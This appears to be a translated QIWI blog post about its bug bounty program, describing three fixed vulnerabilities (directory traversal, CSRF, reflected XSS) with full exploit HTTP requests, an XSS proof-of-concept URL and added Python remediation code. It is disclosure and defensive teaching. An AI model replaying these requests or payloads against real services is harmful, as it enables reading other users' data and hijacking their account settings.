
3 stories of Ethic Hack. How hackers help QIWI eliminate bugs

Not long ago we launched an interesting program at QIWI called Ethic Hack. In essence, we invite everyone to hunt for errors and bugs in our system interfaces. Find a bug, describe it in a letter, receive a reward from QIWI: that is how the scheme works. When the program launched, the office split into two camps: some believed in its success and in the possibility of help from hackers, while others were skeptical about the venture. Back then it was hard to judge objectively, since we had nothing but probable predictions. Now we do. And we simply want to share the cases we have accumulated with you.



Since the program launched, we have received reports of, and fixed, more than 150 vulnerabilities. For certain vulnerabilities we paid up to 150,000 rubles, but we cannot publish those in the examples.

So the program took off. We accumulated a lot of bugs, which we fixed thanks to the hackers' help. Especially for you, we have picked out several examples: some real Ethic Hack stories.

Story one: reading other people's reports.



Vulnerable host: sms.qiwi.ru
Vulnerability type: directory traversal + weak ID check + no session check
What it allows: reading other people's reports and collecting a crowd of the company's clients along with their actions :)

Where exactly: sms.qiwi.ru, in the report export. The report ID is turned directly into a file path (123456 -> reports/12/34/56.dat). Voila, you have someone else's report :)

A full GET request with an example of stealing someone else's report:

GET /bo/monitor/get_excel_format.jsp?html_file_name=reports/13/41/14.dat&report_name=report7&file_name=report7.xls&report_instance_id= HTTP/1.1
Host: sms.qiwi.ru
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/536.28.10 (KHTML, like Gecko) Version/6.0.3 Safari/536.28.10
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Origin: sms.qiwi.ru
Accept-Encoding: gzip, deflate
Accept-Language: ru
Referer: sms.qiwi.ru/bo/monitor/report_view.jsp?instance_id=144114
Cookie: JSESSIONID=; __utma=200106670.88940096.1367226876.1367244987.1367247574.7; __utmc=200106670; __utmz=200106670.1367247574.7.5.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=site%3Aqiwi.ru%20inurl%
Connection: keep-alive
Proxy-Connection: keep-alive
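As an added illustration, not QIWI's code, here is how a report download handler can close all three gaps at once: the client sends only a report ID (never a file name), the ID must be six digits, the derived path must stay under the reports directory, and the report must belong to the logged-in session. The ownership table, REPORTS_DIR and the session names are assumptions.

```python
import re
from pathlib import Path
from typing import Optional

# Constructed sample data: which session owns which report instance.
# A real system would look this up in the database.
REPORT_OWNERS = {134114: "session-alice", 123456: "session-bob"}
REPORTS_DIR = Path("/srv/sms/reports")  # assumed location of the .dat files
REPORT_ID_RE = re.compile(r"\d{6}")     # the page shows six-digit instance IDs

def report_path(report_id: int) -> Path:
    """Map 123456 -> reports/12/34/56.dat, the layout the page describes."""
    s = f"{report_id:06d}"
    return REPORTS_DIR / s[0:2] / s[2:4] / f"{s[4:6]}.dat"

def resolve_report(raw_id: str, session_id: Optional[str]) -> Path:
    """Return the file to serve, or raise on any of the three failures.

    The client sends only the report ID; it never names a file, so a
    html_file_name=reports/13/41/14.dat style request has no equivalent."""
    if session_id is None:
        raise PermissionError("no session")                      # session check
    if not REPORT_ID_RE.fullmatch(raw_id):
        raise ValueError("report id must be six digits")         # strict ID check
    report_id = int(raw_id)
    if REPORT_OWNERS.get(report_id) != session_id:
        raise PermissionError("report belongs to another user")  # ownership
    path = report_path(report_id)
    # Defence in depth: whatever the mapping does, never leave REPORTS_DIR.
    if REPORTS_DIR.resolve() not in path.resolve().parents:
        raise ValueError("path escapes the reports directory")
    return path

def is_allowed(raw_id: str, session_id: Optional[str]) -> bool:
    """Convenience wrapper: True only when resolve_report would serve a file."""
    try:
        resolve_report(raw_id, session_id)
        return True
    except (PermissionError, ValueError):
        return False
```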

Story two: how it was possible to change notification parameters.



Vulnerable host
ishop.qiwi.ru

Vulnerability type under the OWASP Top 10 classification
A8 - CSRF

Where exactly
ishop.qiwi.ru/notificationSave.action

What it allows
The vulnerability lets an attacker change a user's notification settings (phone number, SMS, etc.) when that user visits a page specially crafted by the attacker.

How to reproduce
1. Log in to the system under some user account.
2. Configure the notifications.
3. Perform step 4 (test).
4. Send the following request using Burp Suite or an equivalent, substituting the session cookie values you received (JSESSIONID):

POST /notificationSave.action HTTP/1.1
Host: ishop.qiwi.ru
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:20.0) Gecko/20100101 Firefox/20.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: ru-RU,ru;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: ishop.qiwi.ru/notifications.action
Cookie: __utma=200106670.867508279.1368788962.1368788962.1369037765.2; __utmz=200106670.1368788962.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmc=200106670; JSESSIONID=.node-ishop04.1; __utma=47471167.1903908478.1369624211.1369650501.1369717004.6; __utmc=47471167; __utmz=47471167.1369717004.6.2.utmcsr=ishopnew.qiwi.ru|utmccn=(referral)|utmcmd=referral|utmcct=/; __utmb=47471167.25.10.1369717004
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 244

phone=&incomingBillMail=true&__checkbox_incomingBillMail=true&__checkbox_outgoingBillMail=true&__checkbox_incomingPayMail=true&__checkbox_incomingPaySMS=true&__checkbox_cancelPayMail=true&__checkbox_cancelPaySMS=true
5. Go to the notification settings page and make sure the phone number and notification settings have changed.

Recommendations for remediation
Add a hidden form field containing a random value, a CSRF token.
www.owasp.org/index.php/Cross-Site_Request_Forgery_%28CSRF%29_Prevention_Cheat_Sheet
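The recommended fix, worked through as an added example rather than QIWI's own code: a per-session token is generated server side, placed in a hidden field of the settings form, and compared in constant time on every POST to notificationSave.action. A cross-site form cannot read the victim's page, so it cannot supply the field, and the JSESSIONID cookie alone no longer suffices. The in-memory session store and field names are assumptions.

```python
import hmac
import secrets

# Constructed in-memory session store; a real app keeps this server side.
SESSIONS = {}

def new_session() -> str:
    """Create a session and bind a fresh, unguessable CSRF token to it."""
    sid = secrets.token_urlsafe(16)
    SESSIONS[sid] = {"csrf": secrets.token_urlsafe(32), "phone": "", "sms": False}
    return sid

def render_notification_form(sid: str) -> str:
    """The settings form carries the token in a hidden field (synchronizer token)."""
    tok = SESSIONS[sid]["csrf"]
    return (
        '<form method="post" action="/notificationSave.action">'
        f'<input type="hidden" name="_csrf" value="{tok}">'
        '<input name="phone"><input type="checkbox" name="incomingPaySMS">'
        "</form>"
    )

def notification_save(sid: str, form: dict) -> bool:
    """Apply the settings only when the submitted token matches the session's."""
    session = SESSIONS.get(sid)
    if session is None:
        return False
    submitted = form.get("_csrf", "")
    # Constant-time comparison so the token cannot be leaked byte by byte.
    if not hmac.compare_digest(submitted.encode(), session["csrf"].encode()):
        return False
    session["phone"] = form.get("phone", "")
    session["sms"] = form.get("incomingPaySMS") == "true"
    return True
```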

Story three: arbitrary code.



The bug was found on the site w.qiwi.ru.

There is no validation or output escaping of the callback parameter in the /user/communication/sendsms.action script.

This makes it possible to execute arbitrary code on the client side.

Registration in the system is not required to carry out the attack. The user only has to open the JavaScript file offered by the browser.

Request example

GET /user/communication/sendsms.action?number=&text=111&callback=<>"'; HTTP/1.1
Host: w.qiwi.ru
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:20.0) Gecko/20100101 Firefox/20.0
Accept: text/javascript, application/javascript, */*
Accept-Language: ru-RU,ru;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Referer: w.qiwi.ru/communication.action
Cookie: __utma=153665022.317299647.1368525797.1368679677.1368684655.3; __utmz=153665022.1368684655.3.3.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=qiwi%20webmoney; JSESSIONID=.node-wb02.2; __utmc=153665022; __utmb=153665022.34.10.1368684655
Connection: keep-alive
Content-Length: 6

Response

HTTP/1.1 200 OK
Date: Thu, 16 May 2013 08:16:14 GMT
Expires: Sat, 6 May 1995 12:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/javascript; charset=utf-8
Content-Length: 142
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive

<>"';({error:0,data:{"confirmedBySms":true,"confirmLink":"","provider":"199","identifier":""},messages:[],errors:[],fieldErrors:[]})

Proof of concept

In Internet Explorer, go to

w.qiwi.ru/user/communication/sendsms.action?number=&text=111&callback=WScript.Echo('XSS');

The browser used for verification was Internet Explorer version 9.
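The missing check, as an added example that is not QIWI's code: a JSONP endpoint should accept only a plain JavaScript identifier as the callback and refuse everything else, so neither the <>"'; payload from the request above nor WScript.Echo('XSS'); can reach the response body. The response shape is modelled on the one shown above; the handler name and sample data are constructed.

```python
import json
import re

# A JS identifier, optionally dotted (jQuery-style callbacks); quotes, brackets,
# parentheses and semicolons can never pass this pattern.
CALLBACK_RE = re.compile(r"[A-Za-z_$][A-Za-z0-9_$]*(\.[A-Za-z_$][A-Za-z0-9_$]*)*")

# Constructed sample payload shaped like the response on the page.
SAMPLE_DATA = {"error": 0,
               "data": {"confirmedBySms": True, "confirmLink": "",
                        "provider": "199", "identifier": ""},
               "messages": [], "errors": [], "fieldErrors": []}

def sendsms_response(callback, data=SAMPLE_DATA):
    """Return (status, headers, body) for the JSONP endpoint.

    The vulnerable version concatenated callback + "(" + json + ")" with no
    check, so the raw callback value landed in a text/javascript response."""
    if not callback:
        body = json.dumps(data)                       # plain JSON, no wrapper
        ctype = "application/json; charset=utf-8"
    elif not CALLBACK_RE.fullmatch(callback):
        return 400, {"Content-Type": "text/plain"}, "invalid callback"
    else:
        # json.dumps escapes quotes and backslashes, so data cannot break out.
        body = f"{callback}({json.dumps(data)});"
        ctype = "application/javascript; charset=utf-8"
    headers = {
        "Content-Type": ctype,
        # Stop the browser from second-guessing the declared content type.
        "X-Content-Type-Options": "nosniff",
    }
    return 200, headers, body
```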

Source: https://habr.com/ru/post/187724/

